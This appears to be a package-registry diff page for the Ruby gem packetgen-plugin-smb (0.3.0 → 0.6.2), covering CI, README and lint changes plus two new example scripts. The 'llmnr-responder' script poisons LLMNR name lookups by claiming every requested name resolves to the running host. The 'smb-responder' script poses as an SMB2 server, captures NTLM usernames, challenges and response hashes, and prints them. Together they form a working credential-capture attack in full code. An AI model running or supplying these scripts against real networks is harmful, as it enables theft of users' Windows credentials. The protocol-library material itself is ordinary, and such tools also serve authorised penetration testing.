RubyGems - packetgen-plugin-smb - Versions diffs - 0.3.0 → 0.6.2 - Mend

packetgen-plugin-smb 0.3.0 → 0.6.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (57) hide show

checksums.yaml +4 -4
data/.github/workflows/specs.yml +28 -0
data/.rubocop.yml +8 -1
data/Gemfile +15 -3
data/README.md +59 -3
data/Rakefile +10 -4
data/examples/llmnr-responder +110 -0
data/examples/smb-responder +233 -0
data/lib/packetgen-plugin-smb.rb +5 -2
data/lib/packetgen/plugin/gssapi.rb +11 -6
data/lib/packetgen/plugin/llmnr.rb +58 -0
data/lib/packetgen/plugin/netbios.rb +19 -0
data/lib/packetgen/plugin/netbios/datagram.rb +108 -0
data/lib/packetgen/plugin/netbios/name.rb +64 -0
data/lib/packetgen/plugin/netbios/session.rb +72 -0
data/lib/packetgen/plugin/ntlm.rb +211 -0
data/lib/packetgen/plugin/ntlm/authenticate.rb +197 -0
data/lib/packetgen/plugin/ntlm/av_pair.rb +115 -0
data/lib/packetgen/plugin/ntlm/challenge.rb +140 -0
data/lib/packetgen/plugin/ntlm/negotiate.rb +127 -0
data/lib/packetgen/plugin/ntlm/ntlmv2_response.rb +59 -0
data/lib/packetgen/plugin/smb.rb +27 -15
data/lib/packetgen/plugin/smb/blocks.rb +2 -4
data/lib/packetgen/plugin/smb/browser.rb +8 -8
data/lib/packetgen/plugin/smb/browser/domain_announcement.rb +2 -7
data/lib/packetgen/plugin/smb/browser/host_announcement.rb +10 -7
data/lib/packetgen/plugin/smb/browser/local_master_announcement.rb +2 -7
data/lib/packetgen/plugin/smb/close.rb +2 -2
data/lib/packetgen/plugin/smb/close/request.rb +3 -3
data/lib/packetgen/plugin/smb/close/response.rb +3 -3
data/lib/packetgen/plugin/smb/filetime.rb +30 -3
data/lib/packetgen/plugin/smb/negotiate.rb +20 -0
data/lib/packetgen/plugin/smb/negotiate/dialect.rb +39 -0
data/lib/packetgen/plugin/smb/negotiate/request.rb +35 -0
data/lib/packetgen/plugin/smb/negotiate/response.rb +29 -0
data/lib/packetgen/plugin/smb/nt_create_and_x.rb +2 -2
data/lib/packetgen/plugin/smb/ntcreateandx/request.rb +5 -5
data/lib/packetgen/plugin/smb/ntcreateandx/response.rb +3 -3
data/lib/packetgen/plugin/smb/string.rb +60 -23
data/lib/packetgen/plugin/smb/trans.rb +2 -2
data/lib/packetgen/plugin/smb/trans/request.rb +4 -4
data/lib/packetgen/plugin/smb/trans/response.rb +3 -3
data/lib/packetgen/plugin/smb2.rb +20 -9
data/lib/packetgen/plugin/smb2/base.rb +5 -7
data/lib/packetgen/plugin/smb2/error.rb +3 -4
data/lib/packetgen/plugin/smb2/guid.rb +6 -4
data/lib/packetgen/plugin/smb2/negotiate.rb +2 -2
data/lib/packetgen/plugin/smb2/negotiate/context.rb +28 -27
data/lib/packetgen/plugin/smb2/negotiate/request.rb +16 -12
data/lib/packetgen/plugin/smb2/negotiate/response.rb +25 -14
data/lib/packetgen/plugin/smb2/session_setup.rb +2 -2
data/lib/packetgen/plugin/smb2/session_setup/request.rb +12 -7
data/lib/packetgen/plugin/smb2/session_setup/response.rb +13 -8
data/lib/packetgen/plugin/smb_version.rb +3 -1
data/packetgen-plugin-smb.gemspec +10 -15
metadata +28 -81
data/.travis.yml +0 -12

checksums.yaml CHANGED

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: cc233d3dcb94925757db9c4f5dde9647f97cce4d1e73001f3bbbcb41309ed435
-  data.tar.gz: 50d2ebf353a37d073bae3f6f7458057e4db8a7f2b5c0932094e1820056ab2746
+  metadata.gz: 4b63382e5580528b23ba059cd370db53203efec6cd6273388f88b15976b9343d
+  data.tar.gz: 425f63395bdc0c38e1288f0690fd8cc51c944645b5fc017e2c6289ba9c54b78d
 SHA512:
-  metadata.gz: 5862b573e7b9bba3826f10ef8e1ac8bbb34817e49f93338223ca5fbfcd0ad19cbeb65b64428fc1832c7603fe8a5a5cfc32cb6ac31d63c2e66de4a518ab89de6d
-  data.tar.gz: bb9a3e27eb4c36e3b6197d6450bef4efd73af1e3a0849c07383ea32924d155e0e21f975f7c91b4092ba70cce3d03cb368f92d38311a1a6585c946b5c1462dae5
+  metadata.gz: '08a4a6e817ff3ae8c7c341c6af64722fcdf09331767627adf04c36a6f442dcc6ea7dfb21cd76f2ec3c1f9818b5b3e565806b5391d041130c189de9fc89eacaf6'
+  data.tar.gz: b537ad94930b18a5ab93a219a66090384c84f0cfae44426b42304732c0f31e41c9903e9cf8eb41778e82661eb5803d33cdca640104b7a0e5db37df2497320af9

data/.github/workflows/specs.yml ADDED

@@ -0,0 +1,28 @@
+name: Specs
+on:
+  push:
+    branches: [ master ]
+  pull_request:
+    branches: [ master ]
+jobs:
+  test:
+    strategy:
+      fail-fast: false
+      matrix:
+        os: [ubuntu-latest]
+        ruby: [2.4, 2.5, 2.6, 2.7]
+    runs-on: ${{ matrix.os }}
+    steps:
+    - uses: actions/checkout@v2
+    - name: Install dependencies
+      run: sudo apt-get update -qq && sudo apt-get install libpcap-dev -qq
+    - name: Set up Ruby
+      uses: ruby/setup-ruby@v1
+      with:
+        ruby-version: ${{ matrix.ruby }}
+    - name: Run tests
+      run: |
+        bundle config set path 'vendor/bundle'
+        bundle config set --local without noci
+        bundle install
+        bundle exec rake

data/.rubocop.yml CHANGED

@@ -1,4 +1,7 @@
-TargetRubyVersion: 2.3
+require:
+  - rubocop-performance
+Layout/LineLength:
+  Max: 150
 Layout/SpaceAroundEqualsInParameterDefault:
   EnforcedStyle: no_space
 Lint/EmptyWhen:
@@ -7,8 +10,12 @@ Lint/Void:
   Enabled: false
 Metrics:
   Enabled: false
+Style/AccessModifierDeclarations:
+  Enabled: false
 Style/AsciiComments:
   Enabled: false
+Style/ClassAndModuleChildren:
+  Enabled: false
 Style/Encoding:
   Enabled: false
 Style/EvalWithLocation:

data/Gemfile CHANGED

@@ -1,6 +1,18 @@
-source 'https://rubygems.org'
+# frozen_string_literal: true
-git_source(:github) {|repo_name| "https://github.com/#{repo_name}" }
+source 'https://rubygems.org'
-# Specify your gem's dependencies in packetgen-plugin-smb.gemspec
 gemspec
+gem 'bundler', '>=1.17', '<3'
+gem 'rake', '~> 12.3'
+gem 'rspec', '~> 3.10'
+group :noci do
+  gem 'debase', '~>0.2'
+  gem 'rubocop', '~> 1.6.0'
+  gem 'rubocop-performance', '~> 1.9'
+  gem 'ruby-debug-ide', '~> 0.7'
+  gem 'simplecov', '~> 0.18'
+  gem 'yard', '~> 0.9'
+end

data/README.md CHANGED

@@ -1,9 +1,26 @@
 [![Gem Version](https://badge.fury.io/rb/packetgen-plugin-smb.svg)](https://badge.fury.io/rb/packetgen-plugin-smb)
-[![Build Status](https://travis-ci.com/sdaubert/packetgen-plugin-smb.svg?branch=master)](https://travis-ci.com/sdaubert/packetgen-plugin-smb)
 # Packetgen::Plugin::SMB
-This is a plugin for [PacketGen gem](https://github.com/sdaubert/packetgen). It adds some support for SMB protocol suite.
+This is a plugin for [PacketGen gem](https://github.com/sdaubert/packetgen). It adds some support for SMB protocol suite:
+* NetBIOS:
+  * Datagram service,
+  * Session service,
+* SMB:
+  * SMB common header,
+  * Negotiate command,
+  * Close command,
+  * NtCreateAndX command,
+  * Trans command,
+  * Browser subprotocol,
+* SMB2:
+  * SMB2 common header (support 2.x and 3.x dialects),
+  * Negotiate command,
+  * SessionSetup command,
+* GSSAPI, used to transport negotiation over SMB2 commands,
+* NTLM, SMB authentication protocol,
+* LLMNR (_Link-Local Multicast Name Resolution_), resolution protocol used in SMB networks.
 ## Installation
@@ -23,7 +40,46 @@ Or install it yourself as:
 ## Usage
-TODO
+### SMB2 with NTLM negociation
+See [examples/smb-responder](/examples/smb-responder).
+### LLMNR
+LLMNR is a multicast protocol. Unless you want to have a fine control on UDP layer, the simplest way is to use it over a UDP ruby socket:
+```ruby
+require 'socket'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+LLMNR_MCAST_ADDR = '224.0.0.252'
+LOCAL_IPADDR = 'x.x.x.x' # your IP
+# Open a UDP socket
+socket = UDPSocket.new
+# Bind it to receive LLMNR response packets
+socket.bind(LOCAL_IPADDR, 0)
+# Send a LLMNR query
+query = PacketGen.gen('LLMNR', id: 0x1234, opcode: 'query')
+query.llmnr.qd << { rtype: 'Question', name: 'example.local' }
+socket.send(query.to_s, 0, LLMNR_MCAST_ADDR, PacketGen::Plugin::LLMNR::UDP_PORT)
+# Get answer
+# data = socket.recv(1024)
+data, peer = socket.recvfrom(1024)
+answer = PacketGen.parse(data, first_header: 'LLMNR')
+example_local_ip = answer.llmnr.an.to_a
+                         .find { |an| an.is_a?(PacketGen::Header::DNS::RR) }.human_rdata
+puts example_local_ip
+```
+You have to manage multicast if you want to make a LLMNR responder. For further details, see [examples/llmnr-responder](/examples/llmnr-responder).
+## See also
+API documentation: http://www.rubydoc.info/gems/packetgen-plugin-smb
 ## License

data/Rakefile CHANGED

@@ -1,13 +1,19 @@
+# frozen_string_literal: true
 require 'bundler/gem_tasks'
 require 'rspec/core/rake_task'
-require 'yard'
 task default: :spec
 RSpec::Core::RakeTask.new
-YARD::Rake::YardocTask.new do |t|
-  t.options = ['--no-private']
-  t.files = ['lib/**/*.rb', '-', 'LICENSE']
+begin
+  require 'yard'
+  YARD::Rake::YardocTask.new do |t|
+    t.options = ['--no-private']
+    t.files = ['lib/**/*.rb', '-', 'LICENSE']
+  end
+rescue LoadError
+  # no yard, so no yard task
 end

data/examples/llmnr-responder ADDED

@@ -0,0 +1,110 @@
+#!/usr/bin/env ruby
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+#
+# This small example implements a LLMNR responder. It responds to all LLMNR
+# requests on local network, and says requested name is its IP address.
+# frozen_string_literal: true
+require 'optparse'
+require 'socket'
+require 'ipaddr'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+BIND_ADDR = '0.0.0.0'
+class LlmnrResponder
+  attr_reader :socket, :my_ip, :my_ip_data
+  LLMNR_MCAST_ADDR = '224.0.0.252'
+  def initialize
+    @socket = UDPSocket.new
+  end
+  def start(bind_addr:, iface:)
+    @my_ip = Interfacez.ipv4_address_of(iface)
+    @my_ip_data = IPAddr.new(my_ip).hton
+    configure_multicast(my_ip_data)
+    socket.bind(bind_addr, PacketGen::Plugin::LLMNR::UDP_PORT)
+    start_loop
+  end
+  private
+  def log(str)
+    puts "[LLMNR] #{str}"
+  end
+  def configure_multicast(local_ip_bin)
+    mreq = IPAddr.new(LLMNR_MCAST_ADDR).hton + local_ip_bin
+    socket.setsockopt(:IPPROTO_IP, :IP_ADD_MEMBERSHIP, mreq)
+  end
+  def start_loop
+    loop do
+      data, peer = socket.recvfrom(1024)
+      pkt = PacketGen.parse(data, first_header: 'LLMNR')
+      next unless pkt.is?('LLMNR')
+      peer_port = peer[1]
+      peer_ip = peer[3]
+      log "received LLMNR request from #{peer_ip}"
+      # Forge LLMNR response
+      response_pkt = pkt.reply
+      response_pkt.llmnr.qr = true
+      response_pkt.llmnr.qd.each do |question|
+        next unless (question.human_rrclass == 'IN') && (question.human_type == 'A')
+        log "Say to #{peer_ip} #{question.name} is #{my_ip}"
+        answer = { rtype: 'RR', name: question.name, rdata: my_ip_data }
+        response_pkt.llmnr.an << answer
+      end
+      response_pkt.calc
+      next unless response_pkt.llmnr.ancount > 0
+      socket.send(response_pkt.to_s, 0, peer_ip, peer_port)
+    end
+  end
+end
+def parse_options
+  options = {}
+  OptionParser.new do |opts|
+    opts.banner = "Usage: #{$PROGRAM_NAME} [options]"
+    opts.separator ''
+    opts.separator 'Options:'
+    opts.on_tail('-h', '--help', 'Show this message') do
+      puts opts
+      exit
+    end
+    opts.on('-i IFACE', '--interface IFACE', 'interface on which responds') do |iface|
+      options[:iface] = iface
+    end
+  end.parse!
+  options
+end
+def check_options(options)
+  raise 'No interface given' if options[:iface].nil?
+  raise "unknown interface #{options[:iface]}" unless Interfacez.all.include? options[:iface]
+end
+options = parse_options
+check_options options
+LlmnrResponder.new.start(bind_addr: BIND_ADDR, iface: options[:iface])

data/examples/smb-responder ADDED

@@ -0,0 +1,233 @@
+#!/usr/bin/env ruby
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+#
+# This small example implements a SMB responder. It responds to all SMB
+# Negotiate request to capture credentials.
+# Before running it (as root), llmnr-responder should be running.
+# frozen_string_literal: true
+require 'socket'
+require 'securerandom'
+require 'ostruct'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+BIND_ADDR = '0.0.0.0'
+DOMAIN_NAME = 'SMB3'
+COMPUTER_NAME = 'WIN-AZE546CFHTD'
+Thread.abort_on_exception = true
+Credentials = Struct.new(:user, :computer, :challenge, :proof, :response, :ip) do
+  def to_s
+    user = self.user.encode('UTF-8')
+    computer = self.computer.encode('UTF-8')
+    str = +"User: #{user}\nComputer:#{computer} (IP: #{ip})\n"
+    str << "Challenge: #{challenge}\nProof: #{proof}\n"
+    str << "Response: #{response}"
+  end
+end
+class Smb2Responder
+  attr_reader :socket, :guid, :salt
+  NTLMSSP_OID = '1.3.6.1.4.1.311.2.2.10'
+  STATUS_MORE_PROCESSING_REQUIRED = 0xc0000016
+  STATUS_ACCESS_DENIED = 0xc0000022
+  SMB2_SIZE = 8_388_608
+  SMB2_NEGO_RESP_BUFFER = "`\x82\x01<\x06\x06+\x06\x01\x05\x05\x02\xA0\x82\x0100\x82\x01,\xA0\x1A0\x18\x06\n+\x06\x01\x04\x01\x827\x02\x02\x1E\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xA2\x82\x01\f\x04\x82\x01\bNEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00C%\xB9`\x18\xCE\xC8\xA9\xB7\xB7W\x9B\xC1J\xF5\xC0\x7F\x15\x93\x15k\xE5\x88\n\x9A\\\x9A\xD6\x9EK`\x81\a\xEF\xF7f\xF6\x80\xAA\x17\xE0\xC2\xC5\xE5\xDB\x05\\\v\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xEA\xF9\rM\xB2\xECJ\xE3xn\xC3\bNEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00C%\xB9`\x18\xCE\xC8\xA9\xB7\xB7W\x9B\xC1J\xF5\xC0\\3S\r\xEA\xF9\rM\xB2\xECJ\xE3xn\xC3\b@\x00\x00\x00X\x00\x00\x000V\xA0T0R0'\x80%0#1!0\x1F\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1F\x06\x03U\x04\x03\x13\x18Token Signing Public Key"
+  SMB2_SALT_LEN = 32
+  def initialize
+    @guid = SecureRandom.uuid
+    @salt = SecureRandom.random_bytes(SMB2_SALT_LEN)
+  end
+  def start(bind_addr:)
+    @socket = TCPServer.new(bind_addr, PacketGen::Plugin::NetBIOS::Session::TCP_PORT2)
+    start_loop
+  end
+  private
+  def log(str)
+    puts "[SMB2] #{str}"
+  end
+  def get_smb_data(sock)
+    PacketGen.parse(sock.recv(1024), first_header: 'NetBIOS::Session')
+  end
+  def smb2_nego_resp1
+    return @resp1_pkt if defined? @resp1_pkt
+    @resp1_pkt = PacketGen.gen('NetBIOS::Session')
+                          .add('SMB2', credit: 1)
+                          .add('SMB2::Negotiate::Response',
+                               dialect: 0x2ff,
+                               server_guid: guid, capabilities: 7,
+                               max_trans_size: SMB2_SIZE,
+                               max_read_size: SMB2_SIZE,
+                               max_write_size: SMB2_SIZE)
+    @resp1_pkt.smb2_negotiate_response[:buffer] = PacketGen::Types::String.new.read(SMB2_NEGO_RESP_BUFFER)
+    @resp1_pkt.calc
+    @resp1_pkt
+  end
+  def first_nego_response
+    pkt = smb2_nego_resp1
+    pkt.smb2_negotiate_response[:system_time] = PacketGen::Plugin::SMB::Filetime.now
+    pkt
+  end
+  def second_nego_response(req_pkt)
+    smb2_req = req_pkt.smb2
+    nego_req = req_pkt.smb2_negotiate_request
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit: 1,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::Negotiate::Response',
+                        dialect: nego_req.dialects.last,
+                        server_guid: guid,
+                        capabilities: 0x2f,
+                        max_trans_size: SMB2_SIZE,
+                        max_read_size: SMB2_SIZE,
+                        max_write_size: SMB2_SIZE,
+                        system_time: PacketGen::Plugin::SMB::Filetime.now,
+                        buffer: PacketGen::Types::String.new.read(SMB2_NEGO_RESP_BUFFER))
+    pkt.smb2_negotiate_response.context_list << { type: 1, salt_length: SMB2_SALT_LEN, salt: salt }
+    pkt.smb2_negotiate_response.context_list.last.hash_alg << PacketGen::Types::Int16le.new(1)
+    pkt.smb2_negotiate_response.context_list << { type: 2 }
+    pkt.smb2_negotiate_response.context_list.last.ciphers << PacketGen::Types::Int16le.new(1)
+    pkt.calc
+    pkt
+  end
+  def first_session_setup_response(req_pkt)
+    smb2_req = req_pkt.smb2
+    setup_req = req_pkt.smb2_sessionsetup_request
+    ntlm_nego = PacketGen::Plugin::NTLM.read(setup_req.buffer[:token_init][:mech_token].value)
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit_charge: 1,
+                        credit: 1,
+                        status: STATUS_MORE_PROCESSING_REQUIRED,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::SessionSetup::Response')
+    ntlm = PacketGen::Plugin::NTLM::Challenge.new
+    ntlm.flags = ntlm_nego.flags | 0x00810000
+    ntlm.flags &= 0xfdffff15
+    ntlm.challenge = [rand(2**64)].pack('q<')
+    ntlm.target_name.read('SMB3')
+    ntlm.target_info << { type: 'DomainName', value: DOMAIN_NAME }
+    ntlm.target_info << { type: 'ComputerName', value: COMPUTER_NAME }
+    ntlm.target_info << { type: 'DnsDomainName', value: "#{DOMAIN_NAME}.local" }
+    ntlm.target_info << { type: 'DnsComputerName', value: "#{COMPUTER_NAME}.local" }
+    ntlm.target_info << { type: 'DnsTreeName', value: "#{DOMAIN_NAME}.local" }
+    ntlm.target_info << { type: 'Timestamp', value: PacketGen::Plugin::SMB::Filetime.now.to_human }
+    ntlm.target_info << { type: 'EOL' }
+    ntlm.calc_length
+    gssapi = pkt.smb2_sessionsetup_response.buffer
+    gssapi[:token_resp][:response].value = ntlm.to_s
+    gssapi[:token_resp][:negstate].value = 'accept-incomplete'
+    gssapi[:token_resp][:supported_mech] = NTLMSSP_OID
+    pkt.calc
+    [pkt, ntlm.challenge]
+  end
+  def deny_access(req_pkt)
+    smb2_req = req_pkt.smb2
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit: 1,
+                        credit_charge: 1,
+                        status: STATUS_ACCESS_DENIED,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::SessionSetup::Response')
+    # Remove buffer
+    pkt.smb2_sessionsetup_response[:buffer] = PacketGen::Types::String.new
+    pkt.calc
+    pkt
+  end
+  def start_loop
+    loop do
+      client = socket.accept
+      to_close = false
+      log "connection from #{client.peeraddr[2]}"
+      credentials = Credentials.new
+      credentials.ip = client.peeraddr.last
+      until to_close
+        rcv_pkt = get_smb_data(client)
+        pkt_to_send = case rcv_pkt.headers.last.protocol_name
+                      when 'SMB::Negotiate::Request'
+                        unless rcv_pkt.smb_negotiate_request.dialects.map(&:to_human).include?('SMB 2.???')
+                          to_close = true
+                          nil
+                        end
+                        first_nego_response
+                      when 'SMB2::Negotiate::Request'
+                        second_nego_response rcv_pkt
+                      when 'SMB2::SessionSetup::Request'
+                        gssapi = rcv_pkt.smb2_sessionsetup_request.buffer
+                        if gssapi[:token_init][:mech_types].value.map(&:value).include?(NTLMSSP_OID)
+                          pkt, challenge = first_session_setup_response(rcv_pkt)
+                          credentials.challenge = binary2hex(challenge)
+                          pkt
+                        else
+                          response = PacketGen::Plugin::NTLM.read(gssapi[:token_resp][:response].value)
+                          if response.is_a?(PacketGen::Plugin::NTLM::Authenticate)
+                            credentials.proof = binary2hex(response.nt_response.response)
+                            credentials.user = response.user_name
+                            credentials.computer = response.workstation
+                            credentials.response = binary2hex(response.nt_response.to_s[response.nt_response[:response].sz..-5])
+                            to_close = true
+                            deny_access rcv_pkt
+                          else
+                            to_close = true
+                            nil
+                          end
+                        end
+                      end
+        client.send(pkt_to_send.to_s, 0) if pkt_to_send
+        client.close if to_close
+        puts credentials.to_s unless credentials.response.nil?
+      end
+    end
+  end
+  def binary2hex(str)
+    str.unpack('H*').first
+  end
+end
+Smb2Responder.new.start(bind_addr: BIND_ADDR)